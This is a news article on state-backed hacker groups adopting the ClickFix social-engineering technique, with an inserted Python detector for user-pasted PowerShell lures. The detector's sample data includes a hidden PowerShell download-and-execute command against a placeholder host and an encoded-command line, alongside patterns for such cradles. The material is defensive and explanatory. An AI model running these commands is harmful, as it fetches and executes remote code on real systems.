What began as a ploy by commercial cybercriminals is now becoming a method used by state-supported hacker groups: The ClickFix technique. Originally used by financially motivated attackers to circumvent security mechanisms, it is now being used specifically by actors from North Korea, Iran and Russia for espionage purposes.
Fake security messages are used to manipulate users into entering malicious PowerShell commands themselves – bypassing classic protective measures such as virus scanners and firewalls.
North Korea, Iran and Russia on a deceptive course
Observations by security researchers from Proofpoint show that at the turn of the year 2024/2025, several well-known groups, such as TA427 (North Korea), TA450 (Iran), and UNK_RemoteRogue and TA422 (Russia), successfully integrated ClickFix into their attack strategies. The attacks were carried out via deceptively genuine emails and websites.
For example, TA427 deceived employees of think tanks and smuggled the QuasarRAT spyware onto their computers. The Iranian group TA450, on the other hand, used fake Microsoft warnings to install so-called remote monitoring tools – and thus gained extensive access to entire systems.
Russian groups also adapted the method: UNK_RemoteRogue distributed infected Word documents, while TA422 relied on prepared Google spreadsheets and then accessed sensitive data via Metasploit and SSH tunnels.
Deception instead of technology: Why ClickFix is so dangerous
The key feature of ClickFix is that the user becomes the weak point – not through careless clicking, but through active participation. The classic infection chain, for example through macros in Office documents, is replaced by a psychological component. Anyone who follows the instructions in fake security warnings infects their system themselves – and unknowingly bypasses technical protection barriers in the process.
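A detection-side illustration of the pattern described above, added here as an example and not part of the original article or of Proofpoint's analysis: it scans constructed Windows process-creation events for PowerShell launched from the desktop shell with a command line showing download-and-execute traits, which is what a user pasting a "fix" from a fake warning produces. The field names (Image, ParentImage, CommandLine), the explorer.exe parent heuristic and the sample events are assumptions made for this example.

```python
import re

# Constructed sample events in the shape of Windows process-creation telemetry
# (Sysmon Event ID 1 style fields). Made-up data, not from the Proofpoint report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",   # user pasted a lure into the Run box
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/fix.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",   # same, but base64-encoded payload
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0A"},
    {"ParentImage": r"C:\Program Files\Jenkins\jenkins.exe",  # scripted CI run, benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File C:\\builds\\deploy.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",   # ordinary interactive use, benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
]

# Parent processes that indicate a human typed or pasted the command.
# Assumption: explorer.exe is the parent for the Run dialog / desktop shell path.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits typical of "paste this to fix the problem" lures:
# remote download, in-memory execution, hidden window, encoded payload.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|irm|invoke-restmethod)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def score_event(event: dict) -> dict:
    """Return whether one process-creation event looks ClickFix-like and why."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return {"clickfix_like": False, "indicators": []}
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(event["CommandLine"])]
    # Flag only when a human-launched shell also carries lure-style traits, so
    # scripted automation and plain interactive PowerShell use stay quiet.
    return {"clickfix_like": parent in INTERACTIVE_PARENTS and bool(hits), "indicators": hits}


def find_clickfix_candidates(events: list) -> list:
    """Return (index, indicators) for every event that score_event() flags."""
    scored = [(i, score_event(e)) for i, e in enumerate(events)]
    return [(i, s["indicators"]) for i, s in scored if s["clickfix_like"]]
```

In a real deployment the same logic maps onto an EDR or SIEM query over process-creation events, with the parent-process condition being what separates a user-pasted lure from routine scripted PowerShell.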
A look into the future of digital attacks
The fact that state hacker groups are adopting ClickFix so quickly shows the potential of this method. The technique is still at an early stage – but experts such as Proofpoint assume that it will be used increasingly in the future. This is because ClickFix is not only more difficult to detect than many conventional forms of attack – it is also more flexible to use and frighteningly effective.
Further information:
The full analysis by the Proofpoint experts can be found in the cybersecurity company’s latest threat blog.
(vp/Proofpoint)